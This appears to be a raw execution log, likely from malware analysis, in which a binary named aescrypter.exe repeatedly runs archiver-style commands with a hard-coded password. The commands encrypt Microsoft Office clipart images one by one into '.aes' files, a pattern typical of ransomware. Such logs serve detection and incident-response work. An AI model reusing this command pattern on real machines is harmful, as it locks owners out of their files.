"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01035U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01035U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
